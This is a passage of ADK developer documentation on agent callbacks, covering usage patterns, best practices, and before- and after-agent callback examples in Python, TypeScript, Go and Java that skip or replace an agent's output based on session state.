tool arguments - If a policy violation is detected (e.g., forbidden topics, profanity): - Return a predefined response (`LlmResponse` or `dict`/`Map`) to block the operation - Optionally update `context.state` to log the violation **Example Use Case:** A `before_model_callback` checks `llm_request.contents` for sensitive keywords and returns a standard "Cannot process this request" `LlmResponse` if found, preventing the LLM call. ### 2. Dynamic State Management **Pattern Overview:** Read from and write to session state within callbacks to make agent behavior context-aware and pass data between steps. **Implementation:** - Access `callback_context.state` or `tool_context.state` - Modifications (`state['key'] = value`) are automatically tracked in the subsequent `Event.actions.state_delta` - Changes are persisted by the `SessionService` **Example Use Case:** An `after_tool_callback` saves a `transaction_id` from the tool's result to `tool_context.state['last_transaction_id']`. A later `before_agent_callback` might read `state['user_tier']` to customize the agent's greeting. ### 3. Logging and Monitoring **Pattern Overview:** Add detailed logging at specific lifecycle points for observability and debugging. **Implementation:** - Implement callbacks (e.g., `before_agent_callback`, `after_tool_callback`, `after_model_callback`) - Print or send structured logs containing: - Agent name - Tool name - Invocation ID - Relevant data from the context or arguments **Example Use Case:** Log messages like `INFO: [Invocation: e-123] Before Tool: search_api - Args: {'query': 'ADK'}`. ### 4. Caching **Pattern Overview:** Avoid redundant LLM calls or tool executions by caching results. **Implementation Steps:** 1. **Before Operation:** In `before_model_callback` or `before_tool_callback`: - Generate a cache key based on the request/arguments - Check `context.state` (or an external cache) for this key - If found, return the cached `LlmResponse` or result directly 1. **After Operation:** If cache miss occurred: 1. Use the corresponding `after_` callback to store the new result in the cache using the key **Example Use Case:** `before_tool_callback` for `get_stock_price(symbol)` checks `state[f"cache:stock:{symbol}"]`. If present, returns the cached price; otherwise, allows the API call and `after_tool_callback` saves the result to the state key. ### 5. Request/Response Modification **Pattern Overview:** Alter data just before it's sent to the LLM/tool or just after it's received. **Implementation Options:** - **`before_model_callback`:** Modify `llm_request` (e.g., add system instructions based on `state`) - **`after_model_callback`:** Modify the returned `LlmResponse` (e.g., format text, filter content) - **`before_tool_callback`:** Modify the tool `args` dictionary (or Map in Java) - **`after_tool_callback`:** Modify the `tool_response` dictionary (or Map in Java) **Example Use Case:** `before_model_callback` appends "User language preference: Spanish" to `llm_request.config.system_instruction` if `context.state['lang'] == 'es'`. ### 6. Conditional Skipping of Steps **Pattern Overview:** Prevent standard operations (agent run, LLM call, tool execution) based on certain conditions. **Implementation:** - Return a value from a `before_` callback to skip the normal execution: - `Content` from `before_agent_callback` - `LlmResponse` from `before_model_callback` - `dict` from `before_tool_callback` - The framework interprets this returned value as the result for that step **Example Use Case:** `before_tool_callback` checks `tool_context.state['api_quota_exceeded']`. If `True`, it returns `{'error': 'API quota exceeded'}`, preventing the actual tool function from running. ### 7. Tool-Specific Actions (Authentication & Summarization Control) **Pattern Overview:** Handle actions specific to the tool lifecycle, primarily authentication and controlling LLM summarization of tool results. **Implementation:** Use `ToolContext` within tool callbacks (`before_tool_callback`, `after_tool_callback`): - **Authentication:** Call `tool_context.request_credential(auth_config)` in `before_tool_callback` if credentials are required but not found (e.g., via `tool_context.get_auth_response` or state check). This initiates the auth flow. - **Summarization:** Set `tool_context.actions.skip_summarization = True` if the raw dictionary output of the tool should be passed back to the LLM or potentially displayed directly, bypassing the default LLM summarization step. **Example Use Case:** A `before_tool_callback` for a secure API checks for an auth token in state; if missing, it calls `request_credential`. An `after_tool_callback` for a tool returning structured JSON might set `skip_summarization = True`. ### 8. Artifact Handling **Pattern Overview:** Save or load session-related files or large data blobs during the agent lifecycle. **Implementation:** - **Saving:** Use `callback_context.save_artifact` / `await tool_context.save_artifact` to store data: - Generated reports - Logs - Intermediate data - **Loading:** Use `load_artifact` to retrieve previously stored artifacts - **Tracking:** Changes are tracked via `Event.actions.artifact_delta` **Example Use Case:** An `after_tool_callback` for a "generate_report" tool saves the output file using `await tool_context.save_artifact("report.pdf", report_part)`. A `before_agent_callback` might load a configuration artifact using `callback_context.load_artifact("agent_config.json")`. ## Best Practices for Callbacks ### Design Principles **Keep Focused:** Design each callback for a single, well-defined purpose (e.g., just logging, just validation). Avoid monolithic callbacks. **Mind Performance:** Callbacks execute synchronously within the agent's processing loop. Avoid long-running or blocking operations (network calls, heavy computation). Offload if necessary, but be aware this adds complexity. ### Error Handling **Handle Errors Gracefully:** - Use `try...except/catch` blocks within your callback functions - Log errors appropriately - Decide if the agent invocation should halt or attempt recovery - Don't let callback errors crash the entire process ### State Management **Manage State Carefully:** - Be deliberate about reading from and writing to `context.state` - Changes are immediately visible within the *current* invocation and persisted at the end of the event processing - Use specific state keys rather than modifying broad structures to avoid unintended side effects - Consider using state prefixes (`State.APP_PREFIX`, `State.USER_PREFIX`, `State.TEMP_PREFIX`) for clarity, especially with persistent `SessionService` implementations ### Reliability **Consider Idempotency:** If a callback performs actions with external side effects (e.g., incrementing an external counter), design it to be idempotent (safe to run multiple times with the same input) if possible, to handle potential retries in the framework or your application. ### Testing & Documentation **Test Thoroughly:** - Unit test your callback functions using mock context objects - Perform integration tests to ensure callbacks function correctly within the full agent flow **Ensure Clarity:** - Use descriptive names for your callback functions - Add clear docstrings explaining their purpose, when they run, and any side effects (especially state modifications) **Use Correct Context Type:** Always use the specific context type provided (`CallbackContext` for agent/model, `ToolContext` for tools) to ensure access to the appropriate methods and properties. By applying these patterns and best practices, you can effectively use callbacks to create more robust, observable, and customized agent behaviors in ADK. # Types of Callbacks Supported in ADKPython v0.1.0TypeScript v0.2.0Go v0.1.0Java v0.1.0 The framework provides different types of callbacks that trigger at various stages of an agent's execution. Understanding when each callback fires and what context it receives is key to using them effectively. ## Agent Lifecycle Callbacks These callbacks are available on *any* agent that inherits from `BaseAgent` (including `LlmAgent`, `SequentialAgent`, `ParallelAgent`, `LoopAgent`, etc). Note The specific method names or return types may vary slightly by SDK language (e.g., return `None` in Python, return `Optional.empty()` or `Maybe.empty()` in Java). Refer to the language-specific API documentation for details. ### Before Agent Callback **When:** Called *immediately before* the agent's `_run_async_impl` (or `_run_live_impl`) method is executed. It runs after the agent's `InvocationContext` is created but *before* its core logic begins. **Purpose:** Ideal for setting up resources or state needed only for this specific agent's run, performing validation checks on the session state (callback_context.state) before execution starts, logging the entry point of the agent's activity, or potentially modifying the invocation context before the core logic uses it. Code ```python # Copyright 2025 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # --- Setup Instructions --- # # 1. Install the ADK package: # !pip install google-adk # # Make sure to restart kernel if using colab/jupyter notebooks # # 2. Set up your Gemini API Key: # # - Get a key from Google AI Studio: https://aistudio.google.com/app/apikey # # - Set it as an environment variable: # import os # os.environ["GOOGLE_API_KEY"] = "YOUR_API_KEY_HERE" # <--- REPLACE with your actual key # # Or learn about other authentication methods (like Vertex AI): # # https://google.github.io/adk-docs/agents/models/ # ADK Imports from google.adk.agents import LlmAgent from google.adk.agents.callback_context import CallbackContext from google.adk.runners import InMemoryRunner # Use InMemoryRunner from google.genai import types # For types.Content from typing import Optional # Define the model - Use the specific model name requested GEMINI_2_FLASH="gemini-2.0-flash" # --- 1. Define the Callback Function --- def check_if_agent_should_run(callback_context: CallbackContext) -> Optional[types.Content]: """ Logs entry and checks 'skip_llm_agent' in session state. If True, returns Content to skip the agent's execution. If False or not present, returns None to allow execution. """ agent_name = callback_context.agent_name invocation_id = callback_context.invocation_id current_state = callback_context.state.to_dict() print(f"\n[Callback] Entering agent: {agent_name} (Inv: {invocation_id})") print(f"[Callback] Current State: {current_state}") # Check the condition in session state dictionary if current_state.get("skip_llm_agent", False): print(f"[Callback] State condition 'skip_llm_agent=True' met: Skipping agent {agent_name}.") # Return Content to skip the agent's run return types.Content( parts=[types.Part(text=f"Agent {agent_name} skipped by before_agent_callback due to state.")], role="model" # Assign model role to the overriding response ) else: print(f"[Callback] State condition not met: Proceeding with agent {agent_name}.") # Return None to allow the LlmAgent's normal execution return None # --- 2. Setup Agent with Callback --- llm_agent_with_before_cb = LlmAgent( name="MyControlledAgent", model=GEMINI_2_FLASH, instruction="You are a concise assistant.", description="An LLM agent demonstrating stateful before_agent_callback", before_agent_callback=check_if_agent_should_run # Assign the callback ) # --- 3. Setup Runner and Sessions using InMemoryRunner --- async def main(): app_name = "before_agent_demo" user_id = "test_user" session_id_run = "session_will_run" session_id_skip = "session_will_skip" # Use InMemoryRunner - it includes InMemorySessionService runner = InMemoryRunner(agent=llm_agent_with_before_cb, app_name=app_name) # Get the bundled session service to create sessions session_service = runner.session_service # Create session 1: Agent will run (default empty state) session_service.create_session( app_name=app_name, user_id=user_id, session_id=session_id_run # No initial state means 'skip_llm_agent' will be False in the callback check ) # Create session 2: Agent will be skipped (state has skip_llm_agent=True) session_service.create_session( app_name=app_name, user_id=user_id, session_id=session_id_skip, state={"skip_llm_agent": True} # Set the state flag here ) # --- Scenario 1: Run where callback allows agent execution --- print("\n" + "="*20 + f" SCENARIO 1: Running Agent on Session '{session_id_run}' (Should Proceed) " + "="*20) async for event in runner.run_async( user_id=user_id, session_id=session_id_run, new_message=types.Content(role="user", parts=[types.Part(text="Hello, please respond.")]) ): # Print final output (either from LLM or callback override) if event.is_final_response() and event.content: print(f"Final Output: [{event.author}] {event.content.parts[0].text.strip()}") elif event.is_error(): print(f"Error Event: {event.error_details}") # --- Scenario 2: Run where callback intercepts and skips agent --- print("\n" + "="*20 + f" SCENARIO 2: Running Agent on Session '{session_id_skip}' (Should Skip) " + "="*20) async for event in runner.run_async( user_id=user_id, session_id=session_id_skip, new_message=types.Content(role="user", parts=[types.Part(text="This message won't reach the LLM.")]) ): # Print final output (either from LLM or callback override) if event.is_final_response() and event.content: print(f"Final Output: [{event.author}] {event.content.parts[0].text.strip()}") elif event.is_error(): print(f"Error Event: {event.error_details}") # --- 4. Execute --- # In a Python script: # import asyncio # if __name__ == "__main__": # # Make sure GOOGLE_API_KEY environment variable is set if not using Vertex AI auth # # Or ensure Application Default Credentials (ADC) are configured for Vertex AI # asyncio.run(main()) # In a Jupyter Notebook or similar environment: await main() ``` ```typescript /** * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ import { LlmAgent, InMemoryRunner, CallbackContext, isFinalResponse, } from "@google/adk"; import { Content, createUserContent } from "@google/genai"; const MODEL_NAME = "gemini-2.5-flash"; const APP_NAME = "before_agent_callback_app"; const USER_ID = "test_user_before_agent"; const SESSION_ID_RUN = "session_will_run"; const SESSION_ID_SKIP = "session_will_skip"; // --- 1. Define the Callback Function --- function checkIfAgentShouldRun( callbackContext: CallbackContext ): Content | undefined { /** * Logs entry and checks 'skip_llm_agent' in session state. * If True, returns Content to skip the agent's execution. * If False or not present, returns undefined to allow execution. */ const agentName = callbackContext.agentName; const invocationId = callbackContext.invocationId; const currentState = callbackContext.state; console.log(`\n[Callback] Entering agent: ${agentName} (Inv: ${invocationId})`); console.log(`[Callback] Current State:`, currentState); // Check the condition in session state if (currentState.get("skip_llm_agent") === true) { console.log( `[Callback] State condition 'skip_llm_agent=True' met: Skipping agent ${agentName}.` ); // Return Content to skip the agent's run return { parts: [ { text: `Agent ${agentName} skipped by before_agent_callback due to state.`, }, ], role: "model", // Assign model role to the overriding response }; } else { console.log( `[Callback] State condition not met: Proceeding with agent ${agentName}.` ); // Return undefined to allow the LlmAgent's normal execution return undefined; } } // --- 2. Setup Agent with Callback --- const llmAgentWithBeforeCb = new LlmAgent({ name: "MyControlledAgent", model: MODEL_NAME, instruction: "You are a concise assistant.", description: "An LLM agent demonstrating stateful before_agent_callback", beforeAgentCallback: checkIfAgentShouldRun, // Assign the callback }); // --- 3. Setup Runner and Sessions using InMemoryRunner --- async function main() { // Use InMemoryRunner - it includes InMemorySessionService const runner = new InMemoryRunner({ agent: llmAgentWithBeforeCb, appName: APP_NAME, }); // Create session 1: Agent will run (default empty state) await runner.sessionService.createSession({ appName: APP_NAME, userId: USER_ID, sessionId: SESSION_ID_RUN, // No initial state means 'skip_llm_agent' will be False in the callback check }); // Create session 2: Agent will be skipped (state has skip_llm_agent=True) await runner.sessionService.createSession({ appName: APP_NAME, userId: USER_ID, sessionId: SESSION_ID_SKIP, state: { skip_llm_agent: true }, // Set the state flag here }); // --- Scenario 1: Run where callback allows agent execution --- console.log( `\n==================== SCENARIO 1: Running Agent on Session "${SESSION_ID_RUN}" (Should Proceed) ====================` ); const eventsRun = runner.runAsync({ userId: USER_ID, sessionId: SESSION_ID_RUN, newMessage: createUserContent("Hello, please respond."), }); for await (const event of eventsRun) { // Print final output (either from LLM or callback override) if (isFinalResponse(event) && event.content?.parts?.length) { const finalResponse = event.content.parts .map((part: any) => part.text ?? "") .join(""); console.log( `Final Output: [${event.author}] ${finalResponse.trim()}` ); } else if (event.errorMessage) { console.log(`Error Event: ${event.errorMessage}`); } } // --- Scenario 2: Run where callback intercepts and skips agent --- console.log( `\n==================== SCENARIO 2: Running Agent on Session "${SESSION_ID_SKIP}" (Should Skip) ====================` ); const eventsSkip = runner.runAsync({ userId: USER_ID, sessionId: SESSION_ID_SKIP, newMessage: createUserContent("This message won't reach the LLM."), }); for await (const event of eventsSkip) { // Print final output (either from LLM or callback override) if (isFinalResponse(event) && event.content?.parts?.length) { const finalResponse = event.content.parts .map((part: any) => part.text ?? "") .join(""); console.log( `Final Output: [${event.author}] ${finalResponse.trim()}` ); } else if (event.errorMessage) { console.log(`Error Event: ${event.errorMessage}`); } } } // --- 4. Execute --- main(); ``` ```go package main import ( "context" "fmt" "log" "regexp" "strings" "google.golang.org/adk/agent" "google.golang.org/adk/agent/llmagent" "google.golang.org/adk/model" "google.golang.org/adk/model/gemini" "google.golang.org/adk/runner" "google.golang.org/adk/session" "google.golang.org/adk/tool" "google.golang.org/adk/tool/functiontool" "google.golang.org/genai" ) // 1. Define the Callback Function func onBeforeAgent(ctx agent.CallbackContext) (*genai.Content, error) { agentName := ctx.AgentName() log.Printf("[Callback] Entering agent: %s", agentName) if skip, _ := ctx.State().Get("skip_llm_agent"); skip == true { log.Printf("[Callback] State condition met: Skipping agent %s", agentName) return genai.NewContentFromText( fmt.Sprintf("Agent %s skipped by before_agent_callback.", agentName), genai.RoleModel, ), nil } log.Printf("[Callback] State condition not met: Running agent %s", agentName) return nil, nil } // 2. Define a function to set up and run the agent with the callback. func runBeforeAgentExample() { ctx := context.Background() geminiModel, err := gemini.NewModel(ctx, modelName, &genai.ClientConfig{}) if err != nil { log.Fatalf("FATAL: Failed to create model: %v", err) } // 3. Register the callback in the agent configuration. llmCfg := llmagent.Config{ Name: "AgentWithBeforeAgentCallback", BeforeAgentCallbacks: []agent.BeforeAgentCallback{onBeforeAgent}, Model: geminiModel, Instruction: "You are a concise assistant.", } testAgent, err := llmagent.New(llmCfg) if err != nil { log.Fatalf("FATAL: Failed to create agent: %v", err) } sessionService := session.InMemoryService() r, err := runner.New(runner.Config{AppName: appName, Agent: testAgent, SessionService: sessionService}) if err != nil { log.Fatalf("FATAL: Failed to create runner: %v", err) } // 4. Run scenarios to demonstrate the callback's behavior. log.Println("--- SCENARIO 1: Agent should run normally ---") runScenario(ctx, r, sessionService, appName, "session_normal", nil, "Hello, world!") log.Println("\n--- SCENARIO 2: Agent should be skipped ---") runScenario(ctx, r, sessionService, appName, "session_skip", map[string]any{"skip_llm_agent": true}, "This should be skipped.") } ``` ```java import com.google.adk.agents.LlmAgent; import com.google.adk.agents.BaseAgent; import com.google.adk.agents.CallbackContext; import com.google.adk.events.Event; import com.google.adk.runner.InMemoryRunner; import com.google.adk.sessions.Session; import com.google.adk.sessions.State; import com.google.genai.types.Content; import com.google.genai.types.Part; import io.reactivex.rxjava3.core.Flowable; import io.reactivex.rxjava3.core.Maybe; import java.util.Map; import java.util.concurrent.ConcurrentHashMap; public class BeforeAgentCallbackExample { private static final String APP_NAME = "AgentWithBeforeAgentCallback"; private static final String USER_ID = "test_user_456"; private static final String SESSION_ID = "session_id_123"; private static final String MODEL_NAME = "gemini-2.0-flash"; public static void main(String[] args) { BeforeAgentCallbackExample callbackAgent = new BeforeAgentCallbackExample(); callbackAgent.defineAgent("Write a document about a cat"); } // --- 1. Define the Callback Function --- /** * Logs entry and checks 'skip_llm_agent' in session state. If True, returns Content to skip the * agent's execution. If False or not present, returns None to allow execution. */ public Maybe checkIfAgentShouldRun(CallbackContext callbackContext) { String agentName = callbackContext.agentName(); String invocationId = callbackContext.invocationId(); State currentState = callbackContext.state(); System.out.printf("%n[Callback] Entering agent: %s (Inv: %s)%n", agentName, invocationId); System.out.printf("[Callback] Current State: %s%n", currentState.entrySet()); // Check the condition in session state dictionary if (Boolean.TRUE.equals(currentState.get("skip_llm_agent"))) { System.out.printf( "[Callback] State condition 'skip_llm_agent=True' met: Skipping agent %s", agentName); // Return Content to skip the agent's run return Maybe.just( Content.fromParts( Part.fromText( String.format( "Agent %s skipped by before_agent_callback due to state.", agentName)))); } System.out.printf( "[Callback] State condition 'skip_llm_agent=True' NOT met: Running agent %s \n", agentName); // Return empty response to allow the LlmAgent's normal execution return Maybe.empty(); } public void defineAgent(String prompt) { // --- 2. Setup Agent with Callback --- BaseAgent llmAgentWithBeforeCallback = LlmAgent.builder() .model(MODEL_NAME) .name(APP_NAME) .instruction("You are a concise assistant.") .description("An LLM agent demonstrating stateful before_agent_callback") // You can also use a sync version of this callback "beforeAgentCallbackSync" .beforeAgentCallback(this::checkIfAgentShouldRun) .build(); // --- 3. Setup Runner and Sessions using InMemoryRunner --- // Use InMemoryRunner - it includes InMemorySessionService InMemoryRunner runner = new InMemoryRunner(llmAgentWithBeforeCallback, APP_NAME); // Scenario 1: Initial state is null, which means 'skip_llm_agent' will be false in the callback // check runAgent(runner, null, prompt); // Scenario 2: Agent will be skipped (state has skip_llm_agent=true) runAgent(runner, new ConcurrentHashMap<>(Map.of("skip_llm_agent", true)), prompt); } public void runAgent(InMemoryRunner runner, ConcurrentHashMap initialState, String prompt) { // InMemoryRunner automatically creates a session service. Create a session using the service. Session session = runner .sessionService() .createSession(APP_NAME, USER_ID, initialState, SESSION_ID) .blockingGet(); Content userMessage = Content.fromParts(Part.fromText(prompt)); // Run the agent Flowable eventStream = runner.runAsync(USER_ID, session.id(), userMessage); // Print final output (either from LLM or callback override) eventStream.blockingForEach( event -> { if (event.finalResponse()) { System.out.println(event.stringifyContent()); } }); } } ``` **Note on the `before_agent_callback` Example:** - **What it Shows:** This example demonstrates the `before_agent_callback`. This callback runs *right before* the agent's main processing logic starts for a given request. - **How it Works:** The callback function (`check_if_agent_should_run`) looks at a flag (`skip_llm_agent`) in the session's state. - If the flag is `True`, the callback returns a `types.Content` object. This tells the ADK framework to **skip** the agent's main execution entirely and use the callback's returned content as the final response. - If the flag is `False` (or not set), the callback returns `None` or an empty object. This tells the ADK framework to **proceed** with the agent's normal execution (calling the LLM in this case). - **Expected Outcome:** You'll see two scenarios: 1. In the session *with* the `skip_llm_agent: True` state, the agent's LLM call is bypassed, and the output comes directly from the callback ("Agent... skipped..."). 1. In the session *without* that state flag, the callback allows the agent to run, and you see the actual response from the LLM (e.g., "Hello!"). - **Understanding Callbacks:** This highlights how `before_` callbacks act as **gatekeepers**, allowing you to intercept execution *before* a major step and potentially prevent it based on checks (like state, input validation, permissions). ### After Agent Callback **When:** Called *immediately after* the agent's `_run_async_impl` (or `_run_live_impl`) method successfully completes. It does *not* run if the agent was skipped due to `before_agent_callback` returning content or if `end_invocation` was set during the agent's run. **Purpose:** Useful for cleanup tasks, post-execution validation, logging the completion of an agent's activity, modifying final state, or augmenting the agent's final output. Code ```python # Copyright 2025 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # --- Setup Instructions --- # # 1. Install the ADK package: # !pip install google-adk # # Make sure to restart kernel if using colab/jupyter notebooks # # 2. Set up your Gemini API Key: # # - Get a key from Google AI Studio: https://aistudio.google.com/app/apikey # # - Set it as an environment variable: # import os # os.environ["GOOGLE_API_KEY"] = "YOUR_API_KEY_HERE" # <--- REPLACE with your actual key # # Or learn about other authentication methods (like Vertex AI): # # https://google.github.io/adk-docs/agents/models/ # ADK Imports from google.adk.agents import LlmAgent from google.adk.agents.callback_context import CallbackContext from google.adk.runners import InMemoryRunner # Use InMemoryRunner from google.genai import types # For types.Content from typing import Optional # Define the model - Use the specific model name requested GEMINI_2_FLASH="gemini-2.0-flash" # --- 1. Define the Callback Function --- def modify_output_after_agent(callback_context: CallbackContext) -> Optional[types.Content]: """ Logs exit from an agent and checks 'add_concluding_note' in session state. If True, returns new Content to *replace* the agent's original output. If False or not present, returns None, allowing the agent's original output to be used. """ agent_name = callback_context.agent_name invocation_id = callback_context.invocation_id current_state = callback_context.state.to_dict() print(f"\n[Callback] Exiting agent: {agent_name} (Inv: {invocation_id})") print(f"[Callback] Current State: {current_state}") # Example: Check state to decide whether to modify the final output if current_state.get("add_concluding_note", False): print(f"[Callback] State condition 'add_concluding_note=True' met: Replacing agent {agent_name}'s output.") # Return Content to *replace* the agent's own output return types.Content( parts=[types.Part(text=f"Concluding note added by after_agent_callback, replacing original output.")], role="model" # Assign model role to the overriding response ) else: print(f"[Callback] State condition not met: Using agent {agent_name}'s original output.") # Return None - the agent's output produced just before this callback will be used. return None # --- 2. Setup Agent with Callback --- llm_agent_with_after_cb = LlmAgent( name="MySimpleAgentWithAfter", model=GEMINI_2_FLASH, instruction="You are a simple agent. Just say 'Processing complete!'", description="An LLM agent demonstrating after_agent_callback for output modification", after_agent_callback=modify_output_after_agent # Assign the callback here ) # --- 3. Setup Runner and Sessions using InMemoryRunner --- async def main(): app_name = "after_agent_demo" user_id = "test_user_after" session_id_normal = "session_run_normally" session_id_modify = "session_modify_output" # Use InMemoryRunner - it includes InMemorySessionService runner = InMemoryRunner(agent=llm_agent_with_after_cb, app_name=app_name) # Get the bundled session service to create sessions session_service = runner.session_service # Create session 1: Agent output will be used as is (default empty state) session_service.create_session( app_name=app_name, user_id=user_id, session_id=session_id_normal # No initial state means 'add_concluding_note' will be False in the callback check ) # print(f"Session '{session_id_normal}' created with default state.") # Create session 2: Agent output will be replaced by the callback session_service.create_session( app_name=app_name, user_id=user_id, session_id=session_id_modify, state={"add_concluding_note": True} # Set the state flag here ) # print(f"Session '{session_id_modify}' created with state={{'add_concluding_note': True}}.") # --- Scenario 1: Run where callback allows agent's original output --- print("\n" + "="*20 + f" SCENARIO 1: Running Agent on Session '{session_id_normal}' (Should Use Original Output) " + "="*20) async for event in runner.run_async( user_id=user_id, session_id=session_id_normal, new_message=types.Content(role="user", parts=[types.Part(text="Process this please.")]) ): # Print final output (either from LLM or callback override) if event.is_final_response() and event.content: print(f"Final Output: [{event.author}] {event.content.parts[0].text.strip()}") elif event.is_error(): print(f"Error Event: {event.error_details}") # --- Scenario 2: Run where callback replaces the agent's output --- print("\n" + "="*20 + f" SCENARIO 2: Running Agent on Session '{session_id_modify}' (Should Replace Output) " + "="*20) async for event in runner.run_async( user_id=user_id, session_id=session_id_modify, new_message=types.Content(role="user", parts=[types.Part(text="Process this and add note.")]) ): # Print final output (either from LLM or callback override) if event.is_final_response() and event.content: print(f"Final Output: [{event.author}] {event.content.parts[0].text.strip()}") elif event.is_error(): print(f"Error Event: {event.error_details}") # --- 4. Execute --- # In a Python script: # import asyncio # if __name__ == "__main__": # # Make sure GOOGLE_API_KEY environment variable is set if not using Vertex AI auth # # Or ensure Application Default Credentials (ADC) are configured for Vertex AI # asyncio.run(main()) # In a Jupyter Notebook or similar environment: await main() ``` ```typescript /** * Copyright 2025 Google LLC * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ import { LlmAgent, CallbackContext, isFinalResponse, InMemoryRunner, } from "@google/adk"; import { createUserContent } from "@google/genai"; const MODEL_NAME = "gemini-2.5-flash"; const APP_NAME = "after_agent_callback_app"; const USER_ID = "test_user_after_agent"; const SESSION_NORMAL_ID = "session_run_normally_ts"; const SESSION_MODIFY_ID = "session_modify_output_ts"; // --- 1. Define the Callback Function --- /** * Logs exit from an agent and checks "add_concluding_note" in session state. * If True, returns new Content to *replace* the agent's original output. * If False or not present, returns void, allowing the agent's original output to be used. */ function modifyOutputAfterAgent(context: CallbackContext): any { const agentName = context.agentName; const invocationId = context.invocationId; const currentState = context.state; console.log( ` [Callback] Exiting agent: ${agentName} (Inv: ${invocationId})` ); console.log(`[Callback] Current State:`, currentState); // Example: Check state to decide whether to modify the final output if (currentState.get("add_concluding_note") === true) { console.log( `[Callback] State condition "add_concluding_note=true" met: Replacing agent ${agentName}'s output.` ); // Return Content to *replace* the agent's own output return createUserContent( "Concluding note added by after_agent_callback, replacing original output." ); } else { console.log( `[Callback] State condition not met: Using agent ${agentName}'s original output.` ); // Return void/undefined - the agent's output will be used. return; } } // --- 2. Setup Agent with Callback --- const llmAgentWithAfterCb = new LlmAgent({ name: "MySimpleAgentWithAfter", model: MODEL_NAME, instruction: "You are a simple agent. Just say \"Processing complete!\"", description: "An LLM agent demonstrating after_agent_callback for output modification", afterAgentCallback: modifyOutputAfterAgent, // Assign the callback here }); // --- 3. Run the Agent --- async function main() { const runner = new InMemoryRunner({ agent: llmAgentWithAfterCb, appName: APP_NAME, }); // Create session 1: Agent output will be used as is (default empty state) await runner.sessionService.createSession({ appName: APP_NAME, userId: USER_ID, sessionId: SESSION_NORMAL_ID, }); // Create session 2: Agent output will be replaced by the callback await runner.sessionService.createSession({ appName: APP_NAME, userId: USER_ID, sessionId: SESSION_MODIFY_ID, state: { add_concluding_note: true }, // Set the state flag here }); // --- Scenario 1: Run where callback allows agent's original output --- console.log( ` ==================== SCENARIO 1: Running Agent on Session "${SESSION_NORMAL_ID}" (Should Use Original Output) ==================== ` ); const eventsNormal = runner.runAsync({ userId: USER_ID, sessionId: SESSION_NORMAL_ID, newMessage: createUserContent("Process this please."), }); for await (const event of eventsNormal) { if (isFinalResponse(event) && event.content?.parts?.length) { const finalResponse = event.content.parts .map((part: any) => part.text ?? "") .join(""); console.log( `Final Output: [${event.author}] ${finalResponse.trim()}` ); } else if (event.errorMessage) { console.log(`Error Event: ${event.errorMessage}`); } } // --- Scenario 2: Run where callback replaces the agent's output --- console.log( ` ==================== SCENARIO 2: Running Agent on Session "${SESSION_MODIFY_ID}" (Should Replace Output) ==================== ` ); const eventsModify = runner.runAsync({ userId: USER_ID, sessionId: SESSION_MODIFY_ID, newMessage: createUserContent("Process this and add note."), }); for await (const event of eventsModify) { if (isFinalResponse(event) && event.content?.parts?.length) { const finalResponse = event.content.parts .map((part: any) => part.text ?? "") .join(""); console.log( `Final Output: [${event.author}] ${finalResponse.trim()}` ); } else if (event.errorMessage) { console.log(`Error Event: ${event.errorMessage}`); } } } main(); ``` ```go package main import ( "context" "fmt" "log" "regexp" "strings" "google.golang.org/adk/agent" "google.golang.org/adk/agent/llmagent" "google.golang.org/adk/model" "google.golang.org/adk/model/gemini" "google.golang.org/adk/runner" "google.golang.org/adk/session" "google.golang.org/adk/tool" "google.golang.org/adk/tool/functiontool" "google.golang.org/genai" ) func onAfterAgent(ctx agent.CallbackContext) (*genai.Content, error) { agentName := ctx.AgentName() invocationID := ctx.InvocationID() state := ctx.State() log.Printf("\n[Callback] Exiting agent: %s (Inv: %s)", agentName, invocationID) log.Printf("[Callback] Current State: %v", state) if addNote, _ := state.Get("add_concluding_note"); addNote == true { log.Printf("[Callback] State condition 'add_concluding_note=True' met: Replacing agent %s's output.", agentName) return genai.NewContentFromText( "Concluding note added by after_agent_callback, replacing original output.", genai.RoleModel, ), nil } log.Printf("[Callback] State condition not met: Using agent %s's original output.", agentName) return nil, nil } func runAfterAgentExample() { ctx := context.Background() geminiModel, err := gemini.NewModel(ctx, modelName, &genai.ClientConfig{}) if err != nil { log.Fatalf("FATAL: Failed to create model: %v", err) } llmCfg := llmagent.Config{ Name: "AgentWithAfterAgentCallback", AfterAgentCallbacks: []agent.AfterAgentCallback{onAfterAgent}, Model: geminiModel, Instruction: "You are a simple agent. Just say 'Processing complete!'", } testAgent, err := llmagent.New(llmCfg) if err != nil { log.Fatalf("FATAL: Failed to create agent: %v", err) } sessionService := session.InMemoryService() r, err := runner.New(runner.Config{AppName: appName, Agent: testAgent, SessionService: sessionService}) if err != nil { log.Fatalf("FATAL: Failed to create runner: %v", err) } log.Println("--- SCENARIO 1: Should use original output ---") runScenario(ctx, r, sessionService, appName, "session_normal", nil, "Process this.") log.Println("\n--- SCENARIO 2: Should replace output ---") runScenario(ctx, r, sessionService, appName, "session_modify", map[string]any{"add_concluding_note": true}, "Process and add note.") } ``` ```java import com.google.adk.agents.LlmAgent; import com.google.adk.agents.CallbackContext; import com.google.adk.events.Event; import com.google.adk.runner.InMemoryRunner; import com.google.adk.sessions.State; 